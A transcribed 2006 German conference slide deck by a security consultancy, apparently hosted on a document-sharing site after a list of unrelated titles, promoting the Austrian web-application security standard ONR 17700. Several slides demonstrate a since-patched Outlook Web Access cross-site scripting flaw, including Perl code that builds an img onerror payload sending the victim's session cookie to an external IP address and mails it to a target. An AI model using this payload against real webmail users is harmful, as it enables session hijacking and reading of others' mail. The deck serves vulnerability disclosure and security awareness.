Sichere Webapplikationen nach ONR 17700 oder Wer liest meine Emails?



Ähnliche Dokumente
Webapplikationssicherheit (inkl. Livehack) TUGA 15

FAQ s für die Exchange Migration

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity

Anwenderleitfaden Citrix. Stand Februar 2008

Erstellen einer in OWA (Outlook Web App)

Umstieg auf Microsoft Exchange in der Fakultät 02

Agenda SEC Consult Unternehmensberatung GmbH All rights reserved

-Konto Einrichtung. Webmail. Outlook Express. Outlook

SICHERHEITSANALYSE & PENTEST SCHWÄCHEN ERKENNEN HEISST STÄRKE GEWINNEN.

Automatisches Beantworten von - Nachrichten mit einem Exchange Server-Konto

Anlegen eines virtuellen http Server unter Exchange 2003 mittels HOSTNAME

IMAP Backup. Das Programm zum Sichern, Synchronisieren, Rücksichern und ansehen von gesicherten Mails. Hersteller: malu-soft

Lokale Installation von DotNetNuke 4 ohne IIS

Europäischer Fonds für Regionale Entwicklung: EFRE im Bundes-Land Brandenburg vom Jahr 2014 bis für das Jahr 2020 in Leichter Sprache

FL1 Hosting Technische Informationen

Outlook und Outlook Express

VDW Statistik Portal Häufig gestellte Fragen. Version 1.2 ( Katharina Düngfelder & Markus A. Litters) Vorwort

Die Invaliden-Versicherung ändert sich

Georg Heß. Grünes Licht für verlässlichere Online- Services WEB APPLICATION SECURITY. Deutschland sicher im Netz e.v. Köln,

Alle gehören dazu. Vorwort

Web Application Security

Mail-Account Unimail mit der Einstellungen für Outlook Express 5.0

Herzlich willkommen zum Kurs "MS Outlook Verschlüsseln und digitales Signieren von Nachrichten

Intranet Moodle

Serienbrieferstellung in Word mit Kunden-Datenimport aus Excel

Alles was Recht ist. Justiz und Recht besser verstehen.

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

MANUAL FÜR LEHRPERSONEN. Intranet Moodle. Manual für Lehrpersonen V1.0 1 / 7

Man liest sich: POP3/IMAP

s zu Hause lesen

Professionelle Seminare im Bereich MS-Office

Infinigate (Schweiz) AG. Secure Guest Access. - Handout -

Zusätzliches Postfach in Outlook 2010 / Outlook Web Access OWA einbinden

Inhaltsverzeichnis U M S T E L L U N G A U F O F F I C E 3 6 5

DOKUMENTATION PASY. Patientendaten verwalten

Sichere Freigabe und Kommunikation

Arbeit zur Lebens-Geschichte mit Menschen mit Behinderung Ein Papier des Bundesverbands evangelische Behindertenhilfe e.v.

Maileinstellungen Outlook

Zugriff auf OWA Auf OWA kann über folgende URLs zugegriffen werden:

Monatstreff für Menschen ab 50 Temporäre Dateien / Browserverlauf löschen / Cookies

Outlook. sysplus.ch outlook - mail-grundlagen Seite 1/8. Mail-Grundlagen. Posteingang

Was ich als Bürgermeister für Lübbecke tun möchte

Wärmebildkamera. Arbeitszeit: 15 Minuten

FL1 Hosting Kurzanleitung

Schritt-für-Schritt-Anleitung So verschlüsseln Sie Ihr -Konto in Outlook 2003

Kontoeinrichtung: Microsoft Outlook 2007 (POP3)

So empfangen Sie eine verschlüsselte von Wüstenrot

ICS-Addin. Benutzerhandbuch. Version: 1.0

Kurzanleitung SEPPmail

Erfahrungen mit Hartz IV- Empfängern

Projektmanagement in Outlook integriert

Control-M Workload Change Management 8

Verizon Net Conferencing-Benutzerhandbuch: Microsoft Outlook -Integration für Instant Scheduler Instant Meeting- und Instant Net-Konferenz

Was meinen die Leute eigentlich mit: Grexit?

Die Industrie- und Handelskammer arbeitet dafür, dass Menschen überall mit machen können

XING und LinkedIn-Integration in das erecruiter-bewerberportal

Der Name des Profils kann beliebig gewählt werden. Mit Bestätigung auf OK erscheint dieses Fenster:

Papierlos in die Zukunft WebCast d.link for ms exchange

-Verschlüsselung mit Geschäftspartnern

Präsentation: Google-Kalender. Walli Ruedi Knupp Urdorf

IPHONE WLAN, VPN,

a.sign Client Lotus Notes Konfiguration

Anleitung Outlook 2002 & 2003

Leitfaden zur Nutzung von binder CryptShare

Unterrichtsmaterialien in digitaler und in gedruckter Form. Auszug aus:

-konfiguration aller Betriebssysteme

Aktuelles, Mitteilungen und Veranstaltungen verwalten

Installation EPLAN Electric P8 Version Bit Stand: 07/2014

Clientless SSL VPN (WebVPN)

Kurzanleitung Hosting

Microsoft Office Outlook OMS an SMSCreator anbinden

Sichere Kommunikation & Live Hacking. Christian Lechner, Christian Schlosser Raiffeisen Informatik GmbH

Echtzeiterkennung von Cyber Angriffen auf SAP-Systeme mit SAP Enterprise Threat Detection und mehr

ISA Server 2004 Erstellen eines neuen Netzwerkes - Von Marc Grote

@HERZOvision.de. Lokalen -Client mit IMAP einrichten. v by Herzo Media GmbH & Co. KG -

Kurzanleitung Webmail Verteiler

1. Den richtige Webbrowser benutzen Einen Vollzugriff auf alle Funktionen von Outlook Web App ist ausschliesslich mit folgenden Webbrowser möglich.

versand mit Microsoft Outlook bzw. Mozilla Thunderbird

Outlook Vorlagen/Templates

TechNote: Exchange Journaling aktivieren

H i l f e z u m E m p f a n g e n v o n E -M a i l s ü b e r Y a h o o a u f d e m l o k a l e n P C i n O u t l o o k

Informationsbroschüre FX24 Capital Inc.

Word-Vorlagen-System mit Outlookanbindung

Einrichtung V2015/01

Anleitung über den Umgang mit Schildern

Outlook einrichten über POP3

Entwicklung und Stärkung der persönlichen Kompetenzen!

Terminabgleich mit Mobiltelefonen

Anleitung Hosted Exchange

Das Gewissen Sekundarstufe 1 2 Std.

Clientkonfiguration für Hosted Exchange 2010

OCTOPUS Appointment System von ADCOTEL -- System Architektur Version 1.1 vom Adcotel GmbH. I. Übersicht

IMAP-Konfiguration für Mozilla/Netscape auf Windows und UNIX/Linux

How-to: Webserver NAT. Securepoint Security System Version 2007nx

SSL Konfiguration des Mailclients

e-seal Gebrauchsanweisung für Novartis Mitarbeiter mit Microsoft Outlook e-seal_2_8_11_0154_umol

Delta Audit - Fragenkatalog ISO 9001:2014 DIS

Web Application Security

Anleitung für Kunden zum Umgang mit verschlüsselten s von der LASA Brandenburg GmbH

Wie bekomme ich eine Adresse. Eva Lackinger, Rene Morwind Margot Campbell

Transkript:

Sichere Webapplikationen nach ONR 17700 oder Wer liest meine Emails? Advisor for your information security. Essen, 10.-13. Oktober 2006 Version 1.0

SEC Consult Advisor for your information security Information Security Beratung Unabhängigkeit von Produktherstellern Spezialist für technische Audits + Umsetzung Spezialist für die Einführung von Sicherheitsprozessen und Policies Behörden, Banken, Versicherungen, börsennotierte Unternehmen in Zentraleuropa als Kunden 2 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

ONR 17700 Sicherheitstechnische Anforderungen an Webapplikationen Erste Norm im EU-Raum für die Sicherheit von Webanwendungen Entwickelt von Österr. Normungsinsitut, SEC Consult, Großbanken, - versicherungen, Behörden, Wirtschaftsprüfern 2004/05 Vollständige Abdeckung des Sicherheitsbereichs in Webapplikationen (die von anderen Normen z.b. ISO 27001 nur gestreift werden) Gewährleistung eines hohen Sicherheitsniveaus für kritische Webapplikationen Sehr gutes Verhältnis von Investment zu Verbesserung des Sicherheitslevels 3 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

Webapplikationen das schwächste Glied? Infrastruktur (DMZ, Firewalls, ) ist meist OK Viele Webapplikationen (Portale, Shops, Webmail, ) sind unsicher, weil Oft proprietäre Entwicklungen Müssen schwer vorhersehbaren Benutzerinput verarbeiten Stehen ungeschützt im Internet 4 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

Schwachstellen in Webanwendungen nur bei Eigenentwicklungen? Auch Webanwendungen von großen Herstellern wie z.b. der webbasierte Email Client Outlook Web Access (OWA) von Microsoft können verwundbar sein Was ist OWA? Email Client im Web Microsoft Outlook Funktionalität Mehrere Millionen Benutzer weltweit 5 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

Schwachstelle in Microsoft Outlook Web Access (OWA) Entdeckt im SEC Consult Vulnerability Lab Ermöglicht Cross Site Scripting Angriffe auf Nutzer von OWA Übernahme von Mail-Konto möglich Somit Vollzugriff auf alle Mails des kompromittierten Nutzers Microsoft Patch bereits ausgerollt: MS06-029 6 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

Hacking Outlook Web Access (Schritt 1 von 4) Der Angreifer verfasst ein Email, mit dessen Hilfe er die Session seines Opfers übernehmen will, und versendet es als Inline Attachment. #!/usr/bin/perl print "Cross Site Scripting demonstration\n"; print "<img src='http\x00http:///nonexisting_image.gif' onerror='javascript:window.location=http://80.75.240.135/sendcookie.php?cookie='+document.c ookie' alt='<s'\x00\n"; #!/usr/bin/perl use strict; #>./create_attack_mail.pl use Mail::Sender; > exploit.html my $recipients = opfer@example.org'; my $sender = new Mail::Sender {smtp => 'smtp.sec-consult.com'}; if ($sender->openmultipart({from => 't.kerbl@sec-consult.com', to => $recipients, subject => 'Inline HTML file', subtype => 'related', boundary => 'SECSECSECSECSECSECSEC', type => 'multipart/related'}) > 0) { $sender->sendfile( {description => 'html body', ctype => 'text/html; charset=iso-8859-1', disposition => 'NONE', file => 'exploit.html' }); }; Veröffentlichung der Schwachstelle erfolgte in Abstimmung mit Microsoft Development in Redmond, USA 7 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

Hacking Outlook Web Access (Schritt 2 von 4) Das Opfer öffnet das präparierte Email mit Outlook Web Access 8 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

Hacking Outlook Web Access (Schritt 3 von 4) Das Cookie wird im Hintergrund an den Angreifer gesendet, ohne dass das Opfer etwas davon bemerkt 9 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

Hacking Outlook Web Access (Schritt 4 von 4) Nach Übernahme des Cookies kann der Angreifer die Session seines Opfers übernehmen und somit dessen Account vollständig kompromittieren 10 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

SEC Consult Advisory für Outlook Web Access 11 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

ONR 17700 So schützt man sich richtig z.b. vor Cross Site Scripting in Webapplikationen Die ONR 17700 definiert Vorgaben, die z.b. Cross Site Scripting Angriffen entgegenwirken: Kapitel 3: Architektur der Webapplikation Kapitel 5.4: Sitzungsmanagement Kapitel 6: Formulare und Benutzereingaben Werden alle diese Vorgaben der ON- Regel erfüllt, kann Cross Site Scripting unterbunden werden Infos: /17700 12 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

SEC Consult Advisor for your information security Information Security Beratung Unabhängigkeit von Produktherstellern Spezialist für technische Audits + Umsetzung Spezialist für die Einführung von Sicherheitsprozessen und Policies Behörden, Banken, Versicherungen, börsennotierte Unternehmen in Zentraleuropa als Kunden 13 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

Wie erreichen Sie SEC Consult? SEC Consult Unternehmensberatung GmbH Blindengasse 3, A-1080 Wien Tel: +43 / 1 8903043 0 Fax: +43 / 1 8903043 15 Email: office@sec-consult.com http:// Weitere Informationen finden Sie auch auf unserem Messestand: Halle: GA Stand-Nr.: 117 14 2006 SEC Consult Unternehmensberatung GmbH All rights reserved

2024 © DocPlayer.org Datenschutzbestimmungen | Nutzungsbedingungen | Feedback